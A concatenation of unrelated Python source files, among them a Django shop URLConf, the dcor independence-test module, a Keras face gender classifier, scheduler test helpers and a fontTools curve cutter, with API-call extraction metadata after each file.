numpy as np\n'), ((10779, 10798), 'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\n', (10787, 10798), True, 'import numpy as np\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\n', (10962, 10974), True, 'import numpy as np\n')]
from django.urls import path

from . import views

app_name = "shop"

urlpatterns = [
    path('', views.HomePage.as_view(), name="home-page"),
    path('shop/', views.ProductListView.as_view(), name="product-list"),
    path('shop/<int:category_pk>/', views.ProductListView.as_view(), name="product-list"),
    path('shop/products/<int:pk>/', views.ProductDetailView.as_view(), name="product-detail"),
    path('cart/', views.cart_view, name="cart"),
    path('cart/add/<int:product_pk>/', views.add_product_to_order, name="add-product-to-cart"),
    path('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json, name="add-product-to-cart-json"),
    path('checkout/', views.CheckOut.as_view(), name="checkout"),
    path('checkout/<int:address_pk>/', views.CheckOut.as_view(), name="checkout"),
    path('payment/', views.PaymentChoice.as_view(), name="payment-choice"),
    path('payment/order/<int:pk>/', views.MomoPayment.as_view(), name="momo-payment"),
    path('payment/momo/<int:pk>/confirm/', views.ConfirmMomoPayment.as_view(), name="confirm-momo-payment"),
    path('orders/', views.OrderList.as_view(), name="order-list"),
    path('orders/<int:pk>/', views.OrderDetail.as_view(), name="order-detail"),
    path('orders/<int:order_id>/items/<int:pk>/', views.OrderItemDetail.as_view(), name="order-item-detail"),
]
[ "django.urls.path" ]
[((406, 449), 'django.urls.path', 'path', (['"""cart/"""', 'views.cart_view'], {'name': '"""cart"""'}), "('cart/', views.cart_view, name='cart')\n", (410, 449), False, 'from django.urls import path\n'), ((455, 550), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/"""', 'views.add_product_to_order'], {'name': '"""add-product-to-cart"""'}), "('cart/add/<int:product_pk>/', views.add_product_to_order, name=\n 'add-product-to-cart')\n", (459, 550), False, 'from django.urls import path\n'), ((551, 659), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/json/"""', 'views.add_product_to_cart_json'], {'name': '"""add-product-to-cart-json"""'}), "('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json,\n name='add-product-to-cart-json')\n", (555, 659), False, 'from django.urls import path\n')]
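The route names above are what downstream code would reverse. A minimal sketch, assuming this URLConf is mounted in the project's ROOT_URLCONF under the "shop" namespace (the concrete prefix and pk values below are illustrative only, not part of the source):

# Hypothetical usage of the named routes defined above.
from django.urls import reverse

detail_url = reverse("shop:product-detail", kwargs={"pk": 42})        # e.g. "/shop/products/42/" when mounted at the site root
add_to_cart = reverse("shop:add-product-to-cart", kwargs={"product_pk": 7})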
from hitori_generator import Generator
from argparse import ArgumentParser


def generate(n: int, output_file: str) -> None:
    if n < 3 or n > 8:
        print("It isn't valid size")
        exit(4)
    generator = Generator(n)
    data = generator.generate()
    lines = map(lambda x: ' '.join(map(str, x)), data)
    with open(output_file, 'w', encoding='utf-8') as f:
        f.write('\n'.join(lines))


def main():
    p = ArgumentParser()
    p.add_argument('filename', type=str, help='Path to output file')
    p.add_argument('-s', "--size", type=int, default=3,
                   help='Generate SxS field. size must be in [3, 8]. Default is 3')
    args = p.parse_args()
    generate(args.size, args.filename)


if __name__ == '__main__':
    main()
[ "hitori_generator.Generator", "argparse.ArgumentParser" ]
[((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\n', (226, 229), False, 'from hitori_generator import Generator\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (443, 445), False, 'from argparse import ArgumentParser\n')]
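A minimal usage sketch for the CLI above; the module name and output path are assumptions for illustration, not part of the source:

# Hypothetical invocation, assuming the script above is saved as hitori_cli.py.
# Sizes outside [3, 8] make generate() print a message and exit with status 4.
from hitori_cli import generate

generate(5, "puzzle.txt")   # writes a 5x5 field, one space-separated row per line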
from common.make_tx import make_swap_tx
from sol.handle_simple import handle_unknown_detect_transfers


def handle_metaplex(exporter, txinfo):
    transfers_in, transfers_out, _ = txinfo.transfers_net

    if len(transfers_in) == 1 and len(transfers_out) == 1:
        sent_amount, sent_currency, _, _ = transfers_out[0]
        received_amount, received_currency, _, _ = transfers_in[0]
        row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
        exporter.ingest_row(row)
    else:
        handle_unknown_detect_transfers(exporter, txinfo)


def is_nft_mint(txinfo):
    log_instructions = txinfo.log_instructions
    transfers_in, transfers_out, _ = txinfo.transfers_net

    if "MintTo" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0:
        return True
    elif ("MintTo" in log_instructions
          and len(transfers_out) == 1
          and len(transfers_in) == 1
          and transfers_in[0][0] == 1):
        return True
    else:
        return False


def handle_nft_mint(exporter, txinfo):
    transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net

    if len(transfers_in) == 1 and len(transfers_out) == 1:
        sent_amount, sent_currency, _, _ = transfers_out[0]
        received_amount, received_currency, _, _ = transfers_in[0]
        row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
        exporter.ingest_row(row)
        return

    handle_unknown_detect_transfers(exporter, txinfo)
[ "common.make_tx.make_swap_tx", "sol.handle_simple.handle_unknown_detect_transfers" ]
[((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (415, 491), False, 'from common.make_tx import make_swap_tx\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (1368, 1444), False, 'from common.make_tx import make_swap_tx\n')]
""" Functions for testing independence of several distributions. The functions in this module provide methods for testing if the samples generated from two random vectors are independent. """ import numpy as np import scipy.stats from . import _dcor_internals, _hypothesis from ._dcor import u_distance_correlation_sqr from ._utils import _random_state_init, _transform_to_2d def distance_covariance_test( x, y, *, num_resamples=0, exponent=1, random_state=None, n_jobs=1, ): """ Test of distance covariance independence. Compute the test of independence based on the distance covariance, for two random vectors. The test is a permutation test where the null hypothesis is that the two random vectors are independent. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. exponent: float Exponent of the Euclidean distance, in the range :math:`(0, 2)`. Equivalently, it is twice the Hurst parameter of fractional Brownian motion. num_resamples: int Number of permutations resamples to take in the permutation test. random_state: {None, int, array_like, numpy.random.RandomState} Random state to generate the permutations. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- distance_covariance Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> dcor.independence.distance_covariance_test(a, a) HypothesisTest(p_value=1.0, statistic=208.0) >>> dcor.independence.distance_covariance_test(a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=11.75323056...) >>> dcor.independence.distance_covariance_test(b, b) HypothesisTest(p_value=1.0, statistic=1.3604610...) >>> dcor.independence.distance_covariance_test(a, b, ... num_resamples=5, random_state=0) HypothesisTest(p_value=0.5, statistic=11.7532305...) >>> dcor.independence.distance_covariance_test(a, b, ... num_resamples=5, random_state=13) HypothesisTest(p_value=0.3333333..., statistic=11.7532305...) >>> dcor.independence.distance_covariance_test(a, a, ... num_resamples=7, random_state=0) HypothesisTest(p_value=0.125, statistic=208.0) """ x = _transform_to_2d(x) y = _transform_to_2d(y) _dcor_internals._check_same_n_elements(x, y) random_state = _random_state_init(random_state) # Compute U-centered matrices u_x = _dcor_internals._distance_matrix_generic( x, centering=_dcor_internals.double_centered, exponent=exponent) u_y = _dcor_internals._distance_matrix_generic( y, centering=_dcor_internals.double_centered, exponent=exponent) # Use the dcov statistic def statistic_function(distance_matrix): return u_x.shape[0] * _dcor_internals.mean_product( distance_matrix, u_y) return _hypothesis._permutation_test_with_sym_matrix( u_x, statistic_function=statistic_function, num_resamples=num_resamples, random_state=random_state, n_jobs=n_jobs) def partial_distance_covariance_test( x, y, z, *, num_resamples=0, exponent=1, random_state=None, n_jobs=1, ): """ Test of partial distance covariance independence. Compute the test of independence based on the partial distance covariance, for two random vectors conditioned on a third. 
The test is a permutation test where the null hypothesis is that the first two random vectors are independent given the third one. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. z: array_like Observed random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. num_resamples: int Number of permutations resamples to take in the permutation test. random_state: {None, int, array_like, numpy.random.RandomState} Random state to generate the permutations. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- partial_distance_covariance Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> c = np.array([[1000, 0, 0, 1000], ... [0, 1000, 1000, 1000], ... [1000, 1000, 1000, 1000], ... [1000, 1000, 0, 1000]]) >>> dcor.independence.partial_distance_covariance_test(a, a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=142.6664416...) >>> dcor.independence.partial_distance_covariance_test(a, b, c) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(b, b, c) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=2.2533380...e-30) >>> dcor.independence.partial_distance_covariance_test(a, b, c, ... num_resamples=5, random_state=0) HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(a, b, c, ... num_resamples=5, random_state=13) HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(a, c, b, ... num_resamples=7, random_state=0) HypothesisTest(p_value=1.0, statistic=-7.5701764...e-12) """ random_state = _random_state_init(random_state) # Compute U-centered matrices u_x = _dcor_internals._u_distance_matrix(x, exponent=exponent) u_y = _dcor_internals._u_distance_matrix(y, exponent=exponent) u_z = _dcor_internals._u_distance_matrix(z, exponent=exponent) # Compute projections proj = _dcor_internals.u_complementary_projection(u_z) p_xz = proj(u_x) p_yz = proj(u_y) # Use the pdcor statistic def statistic_function(distance_matrix): return u_x.shape[0] * _dcor_internals.u_product( distance_matrix, p_yz) return _hypothesis._permutation_test_with_sym_matrix( p_xz, statistic_function=statistic_function, num_resamples=num_resamples, random_state=random_state, n_jobs=n_jobs) def distance_correlation_t_statistic(x, y): """ Transformation of the bias corrected version of distance correlation used in :func:`distance_correlation_t_test`. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. Returns ------- numpy scalar T statistic. 
See Also -------- distance_correlation_t_test Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_statistic(a, a) inf >>> dcor.independence.distance_correlation_t_statistic(a, b) ... # doctest: +ELLIPSIS -0.4430164... >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_statistic(b, b) inf """ bcdcor = u_distance_correlation_sqr(x, y) n = x.shape[0] v = n * (n - 3) / 2 return np.sqrt(v - 1) * bcdcor / np.sqrt(1 - bcdcor**2) def distance_correlation_t_test(x, y): """ Test of independence for high dimension based on convergence to a Student t distribution. The null hypothesis is that the two random vectors are independent. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- distance_correlation_t_statistic Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_test(a, a) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.0, statistic=inf) >>> dcor.independence.distance_correlation_t_test(a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.6327451..., statistic=-0.4430164...) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_test(b, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.0, statistic=inf) """ t_test = distance_correlation_t_statistic(x, y) n = x.shape[0] v = n * (n - 3) / 2 df = v - 1 p_value = 1 - scipy.stats.t.cdf(t_test, df=df) return _hypothesis.HypothesisTest(p_value=p_value, statistic=t_test)
[ "numpy.sqrt" ]
[((9268, 9292), 'numpy.sqrt', 'np.sqrt', (['(1 - bcdcor ** 2)'], {}), '(1 - bcdcor ** 2)\n', (9275, 9292), True, 'import numpy as np\n'), ((9242, 9256), 'numpy.sqrt', 'np.sqrt', (['(v - 1)'], {}), '(v - 1)\n', (9249, 9256), True, 'import numpy as np\n')]
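For reference, the statistic implemented by distance_correlation_t_statistic above can be written out explicitly; the symbol R*_n below stands for the bias-corrected squared distance correlation returned by u_distance_correlation_sqr (the notation is ours, not the library's):

v = \frac{n(n-3)}{2}, \qquad
T = \sqrt{v - 1}\;\frac{\mathcal{R}^*_n}{\sqrt{1 - (\mathcal{R}^*_n)^2}}

distance_correlation_t_test then reports p = 1 - F_{t_{v-1}}(T), the upper tail of a Student t distribution with v - 1 degrees of freedom, matching the scipy.stats.t.cdf call in the source.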
# coding=utf-8
# Gender recognition (性别识别)
import cv2
from keras.models import load_model
import numpy as np
import chineseText

img = cv2.imread("img/gather.png")
face_classifier = cv2.CascadeClassifier(
    "d:\Python36\Lib\site-packages\opencv-master\data\haarcascades\haarcascade_frontalface_default.xml"
)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(
    gray, scaleFactor=1.2, minNeighbors=3, minSize=(140, 140))

gender_classifier = load_model(
    "classifier/gender_models/simple_CNN.81-0.96.hdf5")
gender_labels = {0: '女', 1: '男'}  # 0: female, 1: male
color = (255, 255, 255)

for (x, y, w, h) in faces:
    # crop the face region with a margin, then scale to the classifier's input size
    face = img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]
    face = cv2.resize(face, (48, 48))
    face = np.expand_dims(face, 0)
    face = face / 255.0
    gender_label_arg = np.argmax(gender_classifier.predict(face))
    gender = gender_labels[gender_label_arg]
    cv2.rectangle(img, (x, y), (x + h, y + w), color, 2)
    img = chineseText.cv2ImgAddText(img, gender, x + h, y, color, 30)

cv2.imshow("Image", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
[ "cv2.rectangle", "keras.models.load_model", "cv2.imshow", "cv2.waitKey", "cv2.destroyAllWindows", "cv2.cvtColor", "numpy.expand_dims", "cv2.CascadeClassifier", "cv2.resize", "cv2.imread", "chineseText.cv2ImgAddText" ]
[((113, 141), 'cv2.imread', 'cv2.imread', (['"""img/gather.png"""'], {}), "('img/gather.png')\n", (123, 141), False, 'import cv2\n'), ((160, 299), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""d:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml"""'], {}), "(\n 'd:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml'\n )\n", (181, 299), False, 'import cv2\n'), ((296, 333), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2GRAY'], {}), '(img, cv2.COLOR_BGR2GRAY)\n', (308, 333), False, 'import cv2\n'), ((460, 522), 'keras.models.load_model', 'load_model', (['"""classifier/gender_models/simple_CNN.81-0.96.hdf5"""'], {}), "('classifier/gender_models/simple_CNN.81-0.96.hdf5')\n", (470, 522), False, 'from keras.models import load_model\n'), ((1010, 1034), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'img'], {}), "('Image', img)\n", (1020, 1034), False, 'import cv2\n'), ((1035, 1049), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1046, 1049), False, 'import cv2\n'), ((1050, 1073), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1071, 1073), False, 'import cv2\n'), ((685, 711), 'cv2.resize', 'cv2.resize', (['face', '(48, 48)'], {}), '(face, (48, 48))\n', (695, 711), False, 'import cv2\n'), ((723, 746), 'numpy.expand_dims', 'np.expand_dims', (['face', '(0)'], {}), '(face, 0)\n', (737, 746), True, 'import numpy as np\n'), ((886, 938), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + h, y + w)', 'color', '(2)'], {}), '(img, (x, y), (x + h, y + w), color, 2)\n', (899, 938), False, 'import cv2\n'), ((949, 1008), 'chineseText.cv2ImgAddText', 'chineseText.cv2ImgAddText', (['img', 'gender', '(x + h)', 'y', 'color', '(30)'], {}), '(img, gender, x + h, y, color, 30)\n', (974, 1008), False, 'import chineseText\n')]
from django.test import TestCase from os import path from rest_framework import status from rest_framework.test import APIClient import random from scheduler.models import Profile from scheduler.factories import ( CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for, ) random.seed(0) COURSE_NAMES = ("CS88", "CS61A", "CS61B", "CS70", "CS61C", "EE16A") ROLE_MAP = Profile.ROLE_MAP BASE_PATH = "/scheduler" # ----- REQUEST UTILITIES ----- def fail_msg(ep, resp): return "Endpoint: {}\nResponse Content: {}".format(ep, resp.content) class APITestCase(TestCase): def get_client_for(self, user): """Returns an APIClient object that is logged in as the provided user.""" client = APIClient() client.force_authenticate(user) return client def request(self, method, endpoint, exp_code=None, data=None): """ Performs a request to the specified endpoint and returns the response object. Also checks if the status code of the response is exp_code, if provided. The method parameter should be a get/post/etc from an APIClient object. """ resp = method(path.join(BASE_PATH, endpoint.strip("/")), follow=True, data=data) if exp_code is not None: self.assertEqual(resp.status_code, exp_code, msg=fail_msg(endpoint, resp)) return resp def req_fails_perms(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it fails due to the user lacking proper permissions. The method parameter should be a get/post/etc from an APIClient object. Returns the response object afterwards. """ return self.request( method, endpoint, exp_code=status.HTTP_403_FORBIDDEN, data=data ) def req_fails_method(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it fails due to the endpoint not supporting the provided method. Returns the response object. """ return self.request( method, endpoint, exp_code=status.HTTP_405_METHOD_NOT_ALLOWED, data=data ) def req_succeeds(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it succeeds. The method parameter should be a get/post/etc from an APIClient object. Returns the response object. """ return self.request(method, endpoint, exp_code=status.HTTP_200_OK, data=data) # ----- MODEL GENERATION ----- def random_objs(clazz, n=1): """ Generates N instances of the provided class, retrieved from the database. """ src = clazz.objects.all() for _ in range(n): yield random.choice(src) def make_test_courses(): """Creates course objects and persists them to database.""" return [CourseFactory.create(name=name) for name in COURSE_NAMES] def make_test_users(n): """Creates N test users and persists them to database.""" return UserFactory.create_batch(n) def give_role(user, role, course): """ Creates a profile for USER in a given ROLE for the provided COURSE, and saves the profile to database. """ return ProfileFactory.create( user=user, course=course, leader=None, section=None, role=role ) def create_empty_section_for(mentor): """ Creates a section for MENTOR without populated students. """ return SectionFactory.create(course=mentor.course, mentor=mentor) def enroll_user_as_student(user, section): """ Creates a student profile for USER, and assigns them to the given SECTION. Also creates blank attendances as necessary. Returns the created profile. 
""" student = give_role(user, Profile.STUDENT, section.course) student.section = section student.leader = section.leader create_attendances_for(student) return student def gen_test_data(cls, NUM_USERS=300): """ Adds NUM_USERS users to the database and initializes profiles for them as follows: - 2 coords per course - 4 SMs per coord, each with a section of 3-6 students - 3 JMs per SM, each with a section of 3-6 students """ users = iter(make_test_users(NUM_USERS)) courses = make_test_courses() # for sanity tests, everyone only has one role for now num_courses = len(courses) coords, seniors, juniors, students = [], [], [], [] COORD_COUNT = 2 SM_COUNT = 4 JM_COUNT = 3 def assign(role, leader, c, lst): # returns the profile created profile = give_role(next(users), role, c) profile.leader = leader lst.append(profile) return profile try: for c in courses: # coords for i in range(COORD_COUNT): coord = assign(Profile.COORDINATOR, None, c, coords) # SMs for j in range(SM_COUNT): sm = assign(Profile.SENIOR_MENTOR, coord, c, seniors) section = create_empty_section_for(sm) for k in range(random.randint(3, 6)): students.append(enroll_user_as_student(next(users), section)) # JMs for k in range(JM_COUNT): jm = assign(Profile.JUNIOR_MENTOR, sm, c, juniors) for _ in range(random.randint(3, 6)): students.append( enroll_user_as_student(next(users), section) ) except StopIteration: pass cls.users = users cls.courses = courses cls.coords = coords cls.seniors = seniors cls.juniors = juniors cls.students = students
[ "random.choice", "scheduler.factories.create_attendances_for", "scheduler.factories.UserFactory.create_batch", "random.seed", "rest_framework.test.APIClient", "scheduler.factories.SectionFactory.create", "scheduler.factories.ProfileFactory.create", "scheduler.factories.CourseFactory.create", "random.randint" ]
[((388, 402), 'random.seed', 'random.seed', (['(0)'], {}), '(0)\n', (399, 402), False, 'import random\n'), ((3184, 3211), 'scheduler.factories.UserFactory.create_batch', 'UserFactory.create_batch', (['n'], {}), '(n)\n', (3208, 3211), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3378, 3467), 'scheduler.factories.ProfileFactory.create', 'ProfileFactory.create', ([], {'user': 'user', 'course': 'course', 'leader': 'None', 'section': 'None', 'role': 'role'}), '(user=user, course=course, leader=None, section=None,\n role=role)\n', (3399, 3467), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3600, 3658), 'scheduler.factories.SectionFactory.create', 'SectionFactory.create', ([], {'course': 'mentor.course', 'mentor': 'mentor'}), '(course=mentor.course, mentor=mentor)\n', (3621, 3658), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((4002, 4033), 'scheduler.factories.create_attendances_for', 'create_attendances_for', (['student'], {}), '(student)\n', (4024, 4033), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((821, 832), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (830, 832), False, 'from rest_framework.test import APIClient\n'), ((3027, 3058), 'scheduler.factories.CourseFactory.create', 'CourseFactory.create', ([], {'name': 'name'}), '(name=name)\n', (3047, 3058), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((2905, 2923), 'random.choice', 'random.choice', (['src'], {}), '(src)\n', (2918, 2923), False, 'import random\n'), ((5211, 5231), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5225, 5231), False, 'import random\n'), ((5506, 5526), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5520, 5526), False, 'import random\n')]
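A minimal sketch of how the helpers above compose in a concrete test; the class name and the "profiles/" endpoint are assumptions for illustration, not part of the source:

# Hypothetical test using APITestCase, gen_test_data and the request helpers defined above.
class ProfileListTest(APITestCase):
    @classmethod
    def setUpTestData(cls):
        gen_test_data(cls, NUM_USERS=50)   # populates cls.students, cls.coords, ...

    def test_student_can_hit_endpoint(self):
        student = self.students[0]
        client = self.get_client_for(student.user)
        self.req_succeeds(client.get, "profiles/")   # endpoint name is illustrative only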
import math from fontTools.pens.recordingPen import RecordingPen, replayRecording from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT from coldtype.geometry import Rect, Point def raise_quadratic(start, a, b): c0 = start c1 = (c0[0] + (2/3)*(a[0] - c0[0]), c0[1] + (2/3)*(a[1] - c0[1])) c2 = (b[0] + (2/3)*(a[0] - b[0]), b[1] + (2/3)*(a[1] - b[1])) c3 = (b[0], b[1]) return [c1, c2, c3] __length_cache = {} __split_cache = {} def splitCubicAtT_cached(a, b, c, d, t): global __split_cache abcdt = (a, b, c, d, t) sc = __split_cache.get(abcdt) if sc: return sc else: s = splitCubicAtT(a, b, c, d, t) __split_cache[abcdt] = s return s def calcCubicArcLength_cached(a, b, c, d): #return calcCubicArcLength(a, b, c, d) global __length_cache abcd = (a, b, c, d) lc = __length_cache.get(abcd) if lc: return lc else: l = calcCubicArcLength(a, b, c, d) __length_cache[abcd] = l return l class CurveCutter(): def __init__(self, g, inc=0.0015): if isinstance(g, RecordingPen): self.pen = g else: self.pen = RecordingPen() g.draw(self.pen) self.inc = inc self.length = self.calcCurveLength() def calcCurveLength(self): length = 0 for i, (t, pts) in enumerate(self.pen.value): if t == "curveTo": p1, p2, p3 = pts p0 = self.pen.value[i-1][-1][-1] length += calcCubicArcLength_cached(p0, p1, p2, p3) elif t == "lineTo": pass # todo return length def subsegment(self, start=None, end=None): global __cut_cache inc = self.inc length = self.length ended = False _length = 0 out = [] for i, (t, pts) in enumerate(self.pen.value): if t == "curveTo": p1, p2, p3 = pts p0 = self.pen.value[i-1][-1][-1] length_arc = calcCubicArcLength_cached(p0, p1, p2, p3) if _length + length_arc < end: _length += length_arc else: t = inc tries = 0 while not ended: a, b = splitCubicAtT_cached(p0, p1, p2, p3, t) length_a = calcCubicArcLength_cached(*a) if _length + length_a > end: ended = True out.append(("curveTo", a[1:])) else: t += inc tries += 1 if t == "lineTo": pass # TODO if not ended: out.append((t, pts)) if out[-1][0] != "endPath": out.append(("endPath",[])) return out def subsegmentPoint(self, start=0, end=1): inc = self.inc subsegment = self.subsegment(start=start, end=end) try: t, (a, b, c) = subsegment[-2] tangent = math.degrees(math.atan2(c[1] - b[1], c[0] - b[0]) + math.pi*.5) return c, tangent except ValueError: return None, None
[ "fontTools.misc.bezierTools.splitCubicAtT", "fontTools.pens.recordingPen.RecordingPen", "math.atan2", "fontTools.misc.bezierTools.calcCubicArcLength" ]
[((650, 678), 'fontTools.misc.bezierTools.splitCubicAtT', 'splitCubicAtT', (['a', 'b', 'c', 'd', 't'], {}), '(a, b, c, d, t)\n', (663, 678), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((951, 981), 'fontTools.misc.bezierTools.calcCubicArcLength', 'calcCubicArcLength', (['a', 'b', 'c', 'd'], {}), '(a, b, c, d)\n', (969, 981), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((1195, 1209), 'fontTools.pens.recordingPen.RecordingPen', 'RecordingPen', ([], {}), '()\n', (1207, 1209), False, 'from fontTools.pens.recordingPen import RecordingPen, replayRecording\n'), ((3145, 3181), 'math.atan2', 'math.atan2', (['(c[1] - b[1])', '(c[0] - b[0])'], {}), '(c[1] - b[1], c[0] - b[0])\n', (3155, 3181), False, 'import math\n')]
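A minimal usage sketch for CurveCutter above; the contour coordinates are arbitrary, and all that is assumed is a RecordingPen-style value list of moveTo/curveTo segments:

# Hypothetical example: sample the point and tangent halfway along a single cubic segment.
pen = RecordingPen()
pen.moveTo((0, 0))
pen.curveTo((50, 100), (150, 100), (200, 0))
pen.endPath()

cutter = CurveCutter(pen)
point, tangent = cutter.subsegmentPoint(start=0, end=cutter.length * 0.5)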
""" Project for Udacity Danaodgree in Deep Reinforcement Learning This script train an agent to navigate (and collect bananas!) in a large, square world. A reward of +1 is provided for collecting a yellow banana, and a reward of -1 is provided for collecting a blue banana. Thus, the goal of your agent is to collect as many yellow bananas as possible while avoiding blue bananas. The state space has 37 dimensions and contains the agent's velocity, along with ray-based perception of objects around the agent's forward direction. Given this information, the agent has to learn how to best select actions. Four discrete actions are available, corresponding to: 0 - move forward. 1 - move backward. 2 - turn left. 3 - turn right. The task is episodic, and in order to solve the environment, your agent must get an average score of +13 over 100 consecutive episodes. """ from unityagents import UnityEnvironment import numpy as np from collections import deque from dqn_agent import Agent import torch device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") """ Unity environment configuration Mac: "path/to/Banana.app" Windows (x86): "path/to/Banana_Windows_x86/Banana.exe" Windows (x86_64): "path/to/Banana_Windows_x86_64/Banana.exe" Linux (x86): "path/to/Banana_Linux/Banana.x86" Linux (x86_64): "path/to/Banana_Linux/Banana.x86_64" 